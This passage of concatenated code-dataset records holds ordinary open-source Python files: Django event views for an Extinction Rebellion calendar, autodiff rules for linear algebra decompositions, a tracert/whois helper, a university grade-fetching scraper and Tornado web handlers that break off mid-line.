forms\nfrom phonenumber_field.formfields import PhoneNumberField\n\nfrom extinctionr.utils import get_last_contact, set_last_contact, get_contact\nfrom .models import Action, ActionRole, Attendee, TalkProposal\nfrom .comm import notify_commitments\n\n\nBOOTSTRAP_ATTRS = {'class': 'form-control text-center'}\n\nclass ActionForm(forms.ModelForm):\n class Meta:\n model = Action\n fields = ('name', 'when', 'description', 'public', 'location', 'tags', 'slug', 'accessibility')\n\n\nclass SignupForm(forms.Form):\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n name = forms.CharField(label=\"Your name\", widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n promised = forms.BooleanField(required=False, widget=forms.CheckboxInput(attrs={'class': 'form-check'}))\n role = forms.ModelChoiceField(queryset=None, required=False, widget=forms.Select(attrs=BOOTSTRAP_ATTRS))\n next = forms.CharField(required=False, widget=forms.HiddenInput())\n notes = forms.CharField(required=False, initial='')\n commit = forms.IntegerField(required=False, initial=0, widget=forms.NumberInput(attrs={'class': 'form-control text-center', 'min': 0, 'max': 1000}))\n\n def __init__(self, *args, **kwargs):\n self.action = kwargs.pop('action')\n super().__init__(*args, **kwargs)\n self.fields['role'].queryset = qset = ActionRole.objects.filter(name__in=self.action.available_role_choices)\n if qset:\n self.fields['role'].required = True\n\n\nclass TalkProposalForm(forms.Form):\n location = forms.CharField(widget=forms.Textarea(attrs={'rows': 4, 'class': 'form-control', 'placeholder': 'Your location'}))\n name = forms.CharField(label=\"Your name\", required=True, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n phone = PhoneNumberField(label=\"Phone Number\", required=False, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Phone Number'}))\n\n\ndef _get_actions(request, whatever='', include_future=True, include_past=7):\n token = request.GET.get('token', '')\n req_date = request.GET.get('month','')\n tag_filter = request.GET.get('tag', '')\n context = {}\n today = now().date()\n current_date = today.replace(day=1)\n if token:\n try:\n user_id = signing.Signer().unsign(token)\n except signing.BadSignature:\n return HttpResponse(status=403)\n else:\n user = get_user_model().objects.get(pk=user_id)\n else:\n user = request.user\n actions = Action.objects.for_user(user)\n if whatever.isdigit():\n actions = actions.filter(pk=int(whatever))\n else:\n if req_date:\n current_date = datetime.strptime(req_date, '%Y-%m')\n context['is_cal'] = True\n start_date = current_date - timedelta(days=include_past)\n if not include_future:\n end_date = start_date + timedelta(days=38)\n else:\n end_date = start_date + timedelta(days=3650)\n actions = actions.filter(when__date__range=(start_date, end_date))\n if tag_filter:\n actions = actions.filter(tags__name=tag_filter)\n context['current_tag'] = tag_filter\n context['is_cal'] = True\n context['current_date'] = current_date\n context['today'] = today\n return actions, context\n\n\ndef calendar_view(request, whatever):\n from ics import Calendar, Event\n actions, ctx = _get_actions(request, include_future=True, include_past=30)\n thecal = Calendar()\n thecal.creator = 'XR Mass Events'\n for action in actions:\n evt = Event()\n evt.uid = '{}@{}'.format(action.id, request.get_host())\n evt.name = action.html_title\n evt.description = action.description\n evt.categories = action.tags.names()\n evt.last_modified = action.modified\n evt.url = request.build_absolute_uri(action.get_absolute_url())\n evt.begin = action.when\n evt.duration = timedelta(hours=1)\n # evt.end = action.when + timedelta(hours=1)\n evt.location = action.location\n thecal.events.add(evt)\n response = HttpResponse(thecal, content_type='text/calendar')\n return response\n\n\n@cache_page(1200)\n@csrf_protect\ndef list_actions(request):\n can_add = request.user.has_perm('actions.add_action')\n if request.method == 'POST' and can_add:\n form = ActionForm(request.POST)\n if form.is_valid():\n action = form.save()\n return redirect(action.get_absolute_url())\n else:\n print(form.errors)\n\n qset, ctx = _get_actions(request, include_future=False)\n if not ctx.get('is_cal'):\n actions = Action.objects.for_user(request.user).filter(when__gte=now())\n ctx['upcoming'] = actions[:6]\n else:\n actions = None\n current_date = ctx['current_date']\n ctx['next_month'] = current_date + timedelta(days=31)\n ctx['last_month'] = current_date + timedelta(days=-1)\n\n cal_days = list(calendar.Calendar(firstweekday=6).itermonthdates(current_date.year, current_date.month))\n this_month = []\n this_week = []\n month_actions = defaultdict(list)\n\n for action in qset:\n # Convert day to local day so actions land in the right day for current view.\n day = action.when.astimezone(tz.tzlocal()).date()\n month_actions[day].append(action)\n\n event_colors = {\n 'talk': 'xr-bg-pink',\n 'action': 'xr-bg-green',\n 'ally': 'xr-bg-light-green',\n 'meeting': 'xr-bg-lemon',\n 'orientation': 'xr-bg-purple',\n 'art': 'xr-bg-warm-yellow',\n 'nvda': 'xr-bg-light-blue',\n 'regen': 'xr-warm-yellow xr-bg-dark-blue',\n }\n for daynum, mdate in enumerate(cal_days, 1):\n todays_actions = month_actions[mdate]\n obj = {\n 'day': mdate,\n 'events': todays_actions,\n 'bg': '',\n }\n if mdate.month == current_date.month:\n for a in todays_actions:\n tagnames = a.tags.names()\n for t in a.tags.names():\n color = event_colors.get(t, None)\n if color:\n obj['bg'] = color\n break\n else:\n # previous month\n obj['bg'] = 'bg-light'\n if mdate == ctx['today']:\n obj['today'] = True\n this_week.append(obj)\n if daynum % 7 == 0:\n this_month.append(this_week)\n this_week = []\n if this_week:\n this_month.append(this_week)\n ctx['month'] = this_month\n ctx['can_add'] = can_add\n if ctx['can_add']:\n ctx['form'] = ActionForm()\n calendar_link = 'webcal://{}/action/ical/XR%20Mass%20Events'.format(request.get_host())\n link_pars = {}\n if request.user.is_authenticated:\n link_pars['token'] = signing.Signer().sign(request.user.id)\n if ctx.get('current_tag'):\n link_pars['tag'] = ctx.get('current_tag')\n ctx['calendar_link'] = calendar_link + '?' + urlencode(link_pars)\n resp = render(request, 'list_actions.html', ctx)\n resp['Vary'] = 'Cookie'\n\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n if actions:\n resp['Last-Modified'] = http_date(actions.last().when.timestamp())\n return resp\n\n\n\n@cache_page(1200)\ndef show_action(request, slug):\n action = get_object_or_404(Action, slug=slug)\n ctx = {'action': action}\n if request.user.is_authenticated:\n ctx['attendees'] = Attendee.objects.filter(action=action).select_related('contact').order_by('-mutual_commitment', '-promised', 'pk')\n ctx['promised'] = ctx['attendees'].filter(promised__isnull=False)\n ctx['default_to_email'] = settings.DEFAULT_FROM_EMAIL\n if action.when < now() and action.public:\n # don't allow signups for public actions that already happened\n ctx['already_happened'] = True\n form = None\n elif request.method == 'POST':\n form = SignupForm(request.POST, action=action)\n if form.is_valid():\n data = form.cleaned_data\n commit = abs(data['commit'] or 0)\n atten = action.signup(data['email'],\n data['role'],\n name=data['name'][:100],\n promised=data['promised'],\n commit=commit,\n notes=data['notes'])\n next_url = data['next'] or request.headers.get('referer', '/')\n messages.success(request, \"Thank you for signing up for {}!\".format(action.html_title))\n if commit:\n messages.info(request, \"We will notify you once at least %d others commit\" % commit)\n set_last_contact(request, atten.contact)\n return redirect(next_url)\n else:\n contact = get_contact(email=request.user.email) if request.user.is_authenticated else get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n form = SignupForm(action=action, initial=initial)\n ctx['form'] = form\n ctx['has_roles'] = list(action.available_role_choices)\n ctx['photos'] = list(action.photos.all())\n resp = render(request, 'action.html', ctx)\n resp['Vary'] = 'Cookie'\n resp['Last-Modified'] = http_date(action.modified.timestamp())\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n return resp\n\n\n@never_cache\ndef show_attendees(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n out_fmt = request.GET.get('fmt', 'json')\n attendees = Attendee.objects.filter(action=action).select_related('contact').order_by('contact__last_name')\n num = attendees.count()\n if num > 10:\n half = int(num / 2)\n else:\n half = None\n if out_fmt == 'html':\n resp = HttpResponse('not allowed')\n\n # ctx = {'attendees': attendees, 'half': half, 'can_change': request.user.is_staff, 'slug': action_slug}\n # resp = render(request, 'attendees.html', ctx)\n elif out_fmt == 'csv' and request.user.has_perm('actions.view_attendee'):\n attendees = attendees.order_by('created')\n resp = HttpResponse()\n resp['Content-Type'] = 'text/csv'\n csv_writer = csv.writer(resp)\n header = ('Email', 'First Name', 'Last Name', 'Phone', 'Promised', 'Created')\n csv_writer.writerow(header)\n for attendee in attendees:\n csv_writer.writerow((attendee.contact.email, attendee.contact.first_name, attendee.contact.last_name, attendee.contact.phone, attendee.promised, attendee.created.isoformat()))\n return resp\n\n\n@login_required\ndef send_notifications(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n if request.method == 'POST':\n threshold = int(request.POST['threshold'])\n action_url = request.build_absolute_uri(reverse('actions:action', kwargs={'slug': action_slug}))\n num = notify_commitments(action, threshold, action_url)\n if num:\n messages.success(request, 'Notified %d attendees of their commitment!' % num)\n return redirect(action.get_absolute_url())\n\n\ndef propose_talk(request):\n ctx = {}\n if request.method == 'POST':\n form = TalkProposalForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n prop = TalkProposal.objects.propose(\n strip_tags(data['location']),\n data['email'],\n phone=data['phone'],\n name=data['name'])\n ctx['created'] = prop\n messages.success(request, 'Thank you, {}!'.format(prop.requestor))\n messages.info(request, 'Somebody from Extinction Rebellion will contact you soon to arrange a talk at {}'.format(prop.location))\n set_last_contact(request, prop.requestor)\n return redirect(reverse('extinctionr.actions:talk-proposal'))\n else:\n contact = get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n initial['phone'] = contact.phone\n form = TalkProposalForm(initial=initial)\n ctx['form'] = form\n return render(request, 'talkproposal.html', ctx)\n\n\n@login_required\ndef mark_promised(request, action_slug):\n if request.user.has_perm('action.change_attendee'):\n attendee = get_object_or_404(Attendee, pk=request.POST['id'], action__slug=action_slug)\n if not attendee.promised:\n attendee.promised = now()\n attendee.save()\n return JsonResponse({'status': 'ok'})\n\n\n@login_required\n@never_cache\ndef list_proposals(request):\n ctx = {\n 'talks': TalkProposal.objects.select_related('requestor').order_by('-responded', 'created')\n }\n template = 'list_talks'\n if request.GET.get('format', 'html') == 'csv':\n template += '.csv'\n content_type = 'text/csv'\n content_disposition = 'attachment; filename=\"talks.csv\"'\n else:\n template += '.html'\n content_type = 'text/html'\n content_disposition = None\n response = render(request, template, ctx)\n response['content-type'] = content_type\n if content_disposition:\n response['content-disposition'] = content_disposition\n return response\n\n\n\n@login_required\n@never_cache\ndef talk_respond(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and not talk.responded:\n talk.responded = now()\n talk.responder = request.user\n talk.save()\n return JsonResponse({'id': talk.id})\n\n\n@login_required\n@never_cache\ndef convert_proposal_to_action(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and talk.responded:\n act = Action()\n act.name = \"XR Talk at {}\".format(talk.location.strip())\n act.when = now() + timedelta(days=7)\n act.public = False\n act.description = '''Heading to extinction (and what to do about it)\n\nThis talk will be at {}\n'''.format(talk.location)\n act.slug = 'xr-talk-%d' % talk.id\n try:\n act.save()\n except IntegrityError:\n act = Action.objects.get(slug=act.slug)\n url = '/admin/actions/action/%d/change/' % act.id\n return JsonResponse({'next': url})\n\n","repo_name":"davestgermain/extinctionr","sub_path":"extinctionr/actions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"11175081838","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.tensor as tn\n\nimport tadpole.linalg.unwrapped as la\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n IndexLit,\n Indices,\n)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of tensor decompositions ###\n### ###\n###############################################################################\n\n\n# --- Helpers: identity matrix ---------------------------------------------- #\n\ndef eye(x, inds=None): \n\n if inds is None:\n return tn.space(x).eye()\n\n sind = IndexLit(inds[0], x.shape[0])\n sind1 = IndexLit(inds[1], x.shape[-1])\n\n return tn.space(x).eye(sind, sind1)\n\n\n\n\n# --- Helpers: F-matrix ----------------------------------------------------- #\n\ndef fmatrix(s): \n\n seye = eye(s,\"ij\")\n sdiff = s(\"1j\") - s(\"i1\") + seye\n\n return sdiff / (sdiff**2 + 1e-12) - seye\n\n\n\n\n# --- SVD ------------------------------------------------------------------- #\n\ndef vjp_svd(g, out, x, sind=None, trunc=None):\n\n \"\"\"\n https://arxiv.org/pdf/1909.02659.pdf\n\n Eq. 1, 2, 36 (take complex conjugate of both sides)\n\n \"\"\"\n\n du, ds, dv = g[0], g[1], g[2].H\n u, s, v = out[0], out[1], out[2].H\n\n f = fmatrix(s**2)(\"ij\")\n\n uTdu = u.T(\"im\") @ du(\"mj\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad = eye(s,\"ij\") * ds(\"i1\") \n grad = grad + f * s(\"1j\") * (uTdu(\"ij\") - uTdu.H(\"ij\")) \n grad = grad + f * s(\"i1\") * (vTdv(\"ij\") - vTdv.H(\"ij\"))\n \n\n if tn.iscomplex(x):\n grad = grad + 1j * tn.imag(eye(uTdu) * uTdu) / s(\"1j\")\n\n\n grad = u.C(\"li\") @ grad(\"ij\") @ v.T(\"jr\") \n\n\n if x.shape[0] < x.shape[1]: \n\n vvH = v(\"bm\") @ v.H(\"mr\")\n grad = grad \\\n + ((u(\"la\") / s(\"1a\")) @ dv.T(\"ab\") @ (eye(vvH) - vvH)).C\n\n return grad(*tn.union_inds(x))\n\n\n if x.shape[0] > x.shape[1]:\n\n uuH = u(\"bm\") @ u.H(\"ml\")\n grad = grad \\\n + ((v(\"ra\") / s(\"1a\")) @ du.T(\"ab\") @ (eye(uuH) - uuH)).T\n\n return grad(*tn.union_inds(x))\n\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (general) ------------------------------------------ #\n\ndef vjp_eig(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 4.77 (take complex conjugate of both sides)\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n f = fmatrix(s)(\"ij\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad1 = f * vTdv \n grad2 = f * ((v.T(\"im\") @ v.C(\"mn\")) @ (tn.real(vTdv) * eye(vTdv))(\"nj\"))\n\n grad = ds(\"1j\") * eye(s,\"ij\") + grad1 - grad2\n grad = la.inv(v.T)(\"li\") @ grad(\"ij\") @ v.T(\"jr\")\n \n if not tn.iscomplex(x):\n grad = tn.real(grad)\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (Hermitian) ---------------------------------------- #\n\ndef vjp_eigh(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 4.71 (take complex conjugate of both sides)\n\n Comments:\n\n * numpy and pytorch use UPLO=\"L\" by default\n\n * tensorflow always uses UPLO=\"L\"\n https://www.tensorflow.org/api_docs/python/tf/linalg/eigh\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n grad = eye(s,\"ij\") * ds(\"i1\")\n\n if not tn.allclose(dv, tn.space(dv).zeros()): \n grad = grad + fmatrix(s)(\"ij\") * (v.T(\"im\") @ dv(\"mj\"))\n\n grad = v(\"li\").C @ grad @ v.T(\"jr\") \n\n tl = la.tril(tn.space(grad).ones(), k=-1)\n grad = tn.real(grad) * eye(grad) \\\n + (grad(\"lr\") + grad.H(\"lr\")) * tl(\"lr\") \n \n return grad(*tn.union_inds(x))\n\n\n\n\n# --- QR decomposition ------------------------------------------------------ #\n\ndef vjp_qr(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(r, a):\n\n return la.trisolve(r, a.H, which=\"upper\").H\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(q, dq, r, dr):\n\n m = r(\"im\") @ dr.H(\"mj\") - dq.H(\"im\") @ q(\"mj\")\n\n return trisolve(r(\"jr\"), dq(\"lj\") + q(\"li\") @ hcopyltu(m)(\"ij\"))\n\n\n dq, dr = g\n q, r = out\n\n if x.shape[0] >= x.shape[1]:\n return kernel(q, dq, r, dr)(*tn.union_inds(x))\n\n x1, x2 = x[:, : x.shape[0]], x[:, x.shape[0] :]\n r1, r2 = r[:, : x.shape[0]], r[:, x.shape[0] :]\n dr1, dr2 = dr[:, : x.shape[0]], dr[:, x.shape[0] :]\n\n dx1 = kernel(q, dq(\"li\") + x2(\"lr\") @ dr2.H(\"ri\"), r1, dr1)\n dx2 = q(\"li\") @ dr2(\"ir\")\n\n return la.concat(\n dx1(\"ia\"), \n dx2(\"ib\"), \n inds=tuple(tn.union_inds(x)), \n which=\"right\"\n )\n\n\n\n\n# --- LQ decomposition ------------------------------------------------------ #\n\ndef vjp_lq(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(l, a):\n\n return la.trisolve(l.H, a, which=\"upper\")\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(l, dl, q, dq):\n\n m = l.H(\"im\") @ dl(\"mj\") - dq(\"im\") @ q.H(\"mj\")\n\n return trisolve(l(\"li\"), dq(\"ir\") + hcopyltu(m)(\"ij\") @ q(\"jr\"))\n\n\n dl, dq = g\n l, q = out\n\n if x.shape[0] <= x.shape[1]:\n return kernel(l, dl, q, dq)(*tn.union_inds(x))\n\n x1, x2 = x[: x.shape[1], :], x[x.shape[1] :, :]\n l1, l2 = l[: x.shape[1], :], l[x.shape[1] :, :]\n dl1, dl2 = dl[: x.shape[1], :], dl[x.shape[1] :, :]\n\n dx1 = kernel(l1, dl1, q, dq(\"ir\") + dl2.H(\"il\") @ x2(\"lr\"))\n dx2 = dl2(\"li\") @ q(\"ir\")\n\n return la.concat(\n dx1(\"ai\"), \n dx2(\"bi\"), \n inds=tuple(tn.union_inds(x)), \n which=\"left\"\n )\n\n\n\n\n# --- Record decomp VJPs ---------------------------------------------------- # \n\nad.makevjp(la.svd, vjp_svd)\nad.makevjp(la.eig, vjp_eig)\nad.makevjp(la.eigh, vjp_eigh)\nad.makevjp(la.qr, vjp_qr)\nad.makevjp(la.lq, vjp_lq)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of standard matrix properties and transformations ###\n### ###\n###############################################################################\n\n\n# --- Norm ------------------------------------------------------------------ #\n\ndef vjp_norm(g, out, x, order=None, **opts):\n\n \"\"\"\n https://people.maths.ox.ac.uk/gilesm/files/NA-08-01.pdf\n https://en.wikipedia.org/wiki/Norm_(mathematics)#p-norm\n\n \"\"\"\n\n if order in (None, 'fro'):\n\n return (g / out) * x.C \n\n\n if order == 'nuc':\n\n U, S, VH, error = la.svd(x)\n\n return g * (U.C @ VH.C)\n\n\n raise ValueError(\n f\"vjp_norm: invalid norm order {order} provided. The order must \"\n f\"be one of: None, 'fro', 'nuc'.\"\n )\n\n\n\n\n# --- Trace ----------------------------------------------------------------- #\n\ndef vjp_trace(g, out, x, **opts):\n\n return tn.space(x).eye() * g\n\n\n\n\n# --- Determinant ----------------------------------------------------------- #\n\ndef vjp_det(g, out, x):\n\n return g * out * la.inv(x).T\n\n\n\n\n# --- Inverse --------------------------------------------------------------- #\n\ndef vjp_inv(g, out, x):\n\n grad = -out.T(\"ij\") @ g(\"jk\") @ out.T(\"kl\")\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Diagonal -------------------------------------------------------------- #\n\ndef vjp_diag(g, out, x, inds, **opts): \n\n xinds = list(tn.union_inds(x))\n\n i = min(xinds, key=len)\n j = i.retagged(\"j\")\n k = xinds[1 - xinds.index(i)] \n\n grad = (g(i,\"1\") * tn.space(x).eye(i,j)) @ tn.space(x).eye(j,k) \n\n return tn.transpose_like(grad, x)\n\n\n\n\n# --- Concatenate matrices -------------------------------------------------- #\n\ndef vjp_concat(g, adx, out, *xs, inds, which=None, **opts): \n\n axis = {\n None: 0, \n \"left\": 0, \n \"right\": 1,\n }[which]\n \n start = sum([x.shape[axis] for x in xs[:adx]])\n size = xs[adx].shape[axis] \n\n adx_slice = [slice(None), slice(None)]\n adx_slice[axis] = slice(start, start + size)\n\n return g[tuple(adx_slice)](*tn.union_inds(xs[adx])) \n\n\n\n\n# --- Record standard linalg VJPs ------------------------------------------- #\n\nad.makevjp(la.norm, vjp_norm)\nad.makevjp(la.trace, vjp_trace)\nad.makevjp(la.det, vjp_det)\nad.makevjp(la.inv, vjp_inv)\nad.makevjp(la.diag, vjp_diag)\n\nad.makevjp(la.tril, lambda g, out, x, **opts: la.tril(g, **opts))\nad.makevjp(la.triu, lambda g, out, x, **opts: la.triu(g, **opts))\n\nad.makevjp_combo(la.concat, vjp_concat)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of linear algebra solvers ###\n### ###\n###############################################################################\n\n\n# --- Solve the equation ax = b --------------------------------------------- #\n\ndef vjpA_solve(g, out, a, b):\n\n return -la.solve(a.T, g) @ out.T\n\n\ndef vjpB_solve(g, out, a, b):\n\n return la.solve(a.T, g)\n\n\n\n\n# --- Solve the equation ax = b, assuming a is a triangular matrix ---------- #\n\ndef tri(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": la.tril, \n \"upper\": la.triu,\n }[which]\n\n\ndef opposite(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": \"upper\", \n \"upper\": \"lower\",\n }[which]\n\n\ndef vjpA_trisolve(g, out, a, b, which=None):\n\n return -tri(which)(la.trisolve(a.T, g, which=opposite(which)) @ out.T)\n \n\ndef vjpB_trisolve(g, out, a, b, which=None):\n\n return la.trisolve(a.T, g, which=opposite(which))\n\n\n\n\n# --- Record linalg solver VJPs --------------------------------------------- #\n\nad.makevjp(la.solve, vjpA_solve, vjpB_solve)\nad.makevjp(la.trisolve, vjpA_trisolve, vjpB_trisolve)\n \n\n \n\n","repo_name":"dkilda/tadpole","sub_path":"tadpole/tensorwrap/vjps/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74323685609","text":"from ipwhois import IPWhois\nimport subprocess\nimport re\n\n\ndef tracert(name):\n try:\n return subprocess.check_output(r'tracert ' + name, shell=True)\n except subprocess.CalledProcessError:\n print('ошибка tracert')\n\n\ndef who_is(ip):\n try:\n data = IPWhois(ip).lookup_whois()\n return 'ip : ' + ip + '\\n' + \\\n 'ASN : ' + data['asn'] + '\\n' + \\\n 'country : ' + data['asn_country_code'] + '\\n' + \\\n 'provider : ' + data['nets'][0]['description'] + '\\n' + \\\n 'provider address : ' + data['nets'][0]['address'] + '\\n'\n except:\n return ip + ' : ASN - None'\n\n\ndef main():\n pattern = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n while True:\n print(r'введите ip/имя сервера')\n s = input()\n if s == 'exit':\n break\n else:\n raw_data = tracert(s).decode('cp866')\n if raw_data:\n res = [who_is(ip) for ip in pattern.findall(raw_data)[1:]]\n for i in range(1, len(res) + 1):\n print('number :', i)\n print(res[i - 1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DenisBelovED/TracertExtended","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12070063606","text":"# created by WuLei on January 31 2018\n# wuleiatso@gmail.com\n\nimport jwlogin\nimport re\nfrom lxml import etree\n\nclass query(object):\n def __init__(self, session, sessionid):\n self.session = session\n self.sessionid = sessionid\n\n def get_usercode(self):\n url = 'http://202.113.110.22:8088/tjsfjw/custom/js/SetRootPath.jsp'\n header = {'Accept':'*/*',\n 'Accept-Encoding':'gzip, deflate',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Connection':'keep-alive',\n 'Cookie':'JSESSIONID=' + self.sessionid,\n 'Host':'202.113.110.22:8088',\n 'Referer':'http://202.113.110.22:8088/tjsfjw/student/wsxk.pyfadb.html?menucode=JW130713',\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\n r = self.session.get(url, headers = header)\n self.usercode = re.findall(r'G_USER_CODE = \\'(.*?)\\';', r.text)[0]\n print('user_code: ', self.usercode)\n print('user_name: ', re.findall(r'G_USER_NAME = \\'(.*?)\\';', r.text)[0])\n\n def loadinfo(self):\n url = 'http://202.113.110.22:8088/tjsfjw/student/xscj.stuckcj_data.jsp'\n params = {'sjxz':'sjxz3',\n 'ysyx':'yscj',\n 'zx':'1',\n 'fx':'1',\n 'userCode':str(self.usercode),\n 'xypjwchcnckcj':'0',\n 'pjwchckcjklpbcj':'0',\n 'xn':'2017',\n 'xn1':'2018',\n 'xq':'0',\n 'ysyxS':'on',\n 'sjxzS':'on',\n 'zxC':'on',\n 'fxC':'on',\n 'menucode_current':'JW1314'}\n headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n content = self.session.get(url, params = params, headers = headers)\n return content.text\n\n def parsescores(self, content = None):\n if content == None:\n print('query failed')\n exit(1)\n selector = etree.HTML(content)\n c = selector.xpath('/html/body/table[2]/tbody/tr')\n j=0\n for i in c:\n print(selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[2]/text()')[0] +' ' + selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[8]/text()')[0])\n j = j + 1\n\n\n def holdconnection(self):\n url = 'http://202.113.110.22:8088/tjsfjw/online/message'\n params = {'hidOption':'getOnlineMessage'}\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n r = self.session.get(url, headers = headers, params = params)\n if r.status_code == 200:\n print('holding connection')\n\ndef go():\n s, sid = jwlogin.go()\n q = query(s, sid)\n q.holdconnection()\n q.get_usercode()\n q.holdconnection()\n q.parsescores(content=q.loadinfo())\n\nif __name__ == '__main__':\n go()","repo_name":"3swu/tjsfjwlogin","sub_path":"queryscores.py","file_name":"queryscores.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20741327089","text":"import functools\nimport random\n\nimport tornado.auth\nimport tornado.escape\nimport tornado.gen\nimport tornado.httpclient\nimport tornado.web\n\nfrom tornado.web import HTTPError\nfrom tornado.web import authenticated\n\nimport peewee\n\nfrom peewee import fn\n\nfrom models import User, Repo, HMap, CSet, Token\nfrom handlers import RequestHandler\n\nclass BaseHandler(RequestHandler):\n \"\"\"Base class for all web front end handlers.\"\"\"\n\n def get_current_user(self):\n uid = self.get_secure_cookie(\"uid\")\n user = User.get(User.id == uid) if uid else None\n return user\n\n def set_current_user(self, user):\n self.set_secure_cookie(\"uid\", str(user.id))\n\n def clear_current_user(self):\n self.clear_cookie(\"uid\")\n\n def write_error(self, status_code, **kwargs):\n if status_code == 404:\n self.render(\"error/404.html\")\n else:\n self.render(\"error/gen.html\")\n\nclass HomeHandler(BaseHandler):\n \"\"\"Renders the website index page - nothing more.\"\"\"\n\n def get(self):\n self.render(\"home/index.html\")\n\nclass SearchHandler(BaseHandler):\n def get(self):\n query = tornado.escape.url_unescape(self.get_argument(\"q\", \"\"))\n\n if query:\n pattern = \"%\" + query + \"%\"\n repos = (Repo.select().join(User).alias(\"user\")\n .where(Repo.name ** pattern))\n users = User.select().where(User.name ** pattern)\n else:\n repos = []\n users = []\n\n self.render(\"search/show.html\", query=query, repos=repos, users=users)\n\nclass UserHandler(BaseHandler):\n def get(self, username):\n try:\n user = User.select().where(User.name == username).get()\n self.render(\"user/show.html\", title=user.name, user=user)\n except User.DoesNotExist:\n raise HTTPError(404)\n\nclass EditUserHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Edit account information\"\n self.render(\"user/edit.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n user = self.current_user\n user.name = self.get_argument(\"username\", None)\n user.homepage_url = self.get_argument(\"homepage\", None)\n user.avatar_url = self.get_argument(\"avatar\", None)\n user.email = self.get_argument(\"email\", None)\n user.save()\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass RepoHandler(BaseHandler):\n def get(self, username, reponame):\n try:\n repo = (Repo.select().join(User).alias(\"user\")\n .where((User.name == username) & (Repo.name == reponame))\n .get())\n title = repo.user.name + \"/\" + repo.name\n\n timemap = self.get_query_argument(\"timemap\", \"false\") == \"true\"\n datetime = self.get_query_argument(\"datetime\", None)\n key = self.get_query_argument(\"key\", None)\n\n if key and not timemap:\n self.render(\"repo/memento.html\", repo=repo, key=key,\n datetime=datetime)\n elif key and timemap:\n self.render(\"repo/history.html\", repo=repo, key=key)\n else:\n cs = (CSet.select(fn.distinct(CSet.hkey))\n .where(CSet.repo == repo).limit(5).alias(\"cs\"))\n samples = (HMap.select(HMap.val)\n .join(cs, on=(HMap.sha == cs.c.hkey_id)))\n self.render(\"repo/show.html\", title=title, 